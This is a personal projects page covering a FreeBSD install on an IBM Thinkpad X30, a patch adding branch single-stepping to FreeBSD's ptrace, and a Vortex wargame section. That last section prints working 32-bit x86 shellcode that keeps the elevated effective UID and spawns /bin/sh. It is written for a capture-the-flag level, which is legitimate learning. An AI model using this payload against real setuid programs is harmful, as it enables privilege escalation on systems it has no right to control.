Projects

• Using FreeBSD on an IBM Thinkpad X30

  I not so recently bought a used IBM Thinkpad X30 on eBay and installed FreeBSD on it.

  The specs:
  • Pentium III Mobile, 1.2GHz
  • 512 MB RAM
  • 40 GB Harddrive
  • 12" XGA TFT, Intel i830M shared memory graphics, Xorg works with the i810 driver, OpenGL works using DRI
  • built-in 802.11b Wireless (Prism 2.5), works, using the wi driver
  • 100MBit ethernet, works, using the fxp driver
  • built-in sound, works, using the snd_ich driver
  • built-in CF cardreader, works out of the box
  • cardbus slot, works out of the box with my NEC Warpstar 802.11a/b/g card (that uses the ath driver)
  • with the laptop came an Ultrabase X3 docking station with a CDRW/DVD combo drive.
  Quirks:
  • FreeBSD only picks up the docking station if it's attached while booting the machine
  • Suspend-to-RAM works fine now, but i had to tune /etc/devd.conf, /etc/rc.{standby,resume} and some sysctls to make it work as desired. I also wrote a little script that locks the display when I send the Laptop into Standby. Some quirks remain, sometimes the X server dies after I wake the machine up.
  • Suspend-to-disk doesn't seem to work at all.
  • I couldn't get an externally attached monitor do display anything else but a clone of the TFT image at 60Hz. I'd really like to use some kind of extended desktop.
  You can find some of the files I modified, dmesg output, kernel config, X.org config here.

• Integrating branch single stepping into FreeBSD

  Many modern x86 CPUs support a feature called branch single stepping that changes the semantics of setting the TF (single step) flag in the EFLAGS register in such a way that the CPU will not generate exceptions on every instruction executed but only on branch instructions like JMP, JCC, CALL, RET, INT, ...

  I am working on integrating some code into FreeBSD that will allow developers to utilize this feature through the ptrace() interface.

  I have some ideas on how to use this feature to check branch targets for "legality" (to prevent control flow alteration by malicious user input), which I want to implement at some time in the future. I'm especially interested in what kind of impact these sanity checks will have on system performance.

  Here is an initial patch for FreeBSD RELENG_6 and here a little toy program to play with it (it needs libdisasm).

• Vortex

  a nice and challenging wargame at OverTheWire.org.

  I created the following shellcode originally for level 3 of Vortex. It first determines the EUID and then sets EUID, RUID and SUID to that value to prevent the executed shell from dropping EUID. Instead of using the setresuid() system call, I could probably just use setuid() to save some bytes. I'd like to thank mark for the initial idea and commenting on my code.

  BITS 32 section .text global _start _start: xor eax,eax mov al,0x31 ;geteuid() int 0x80 mov ebx, eax mov ecx, eax mov edx, eax xor eax,eax push eax ;0-terminate shell path ;On Stack: "\x00" mov al,164 ;setresuid() int 0x80 push 0x68732f2f ; On Stack: "//sh\x00" push 0x6e69622f ; On Stack: "/bin//sh\x00" mov ebx,esp ; ebx is now a pointer to ; "/bin//sh\x00" on the stack xor edx,edx ; edx = 0: Empty Environment push edx ; null-terminate the list of ; argument pointers push ebx ; push pointer to "/bin//sh\x00" ; onto the stack mov ecx,esp ; ecx is now a pointer to a null- ; terminated list of pointers to arguments mov al,0xfb ; eax = 0x0b, avoid using 0x0b directly xor al,0xf0 ; because it counts as an argument delimiter int 80h ; execve( path, arguments, environment) mov al,1 ; xor ebx,ebx ; exit(0) int 80h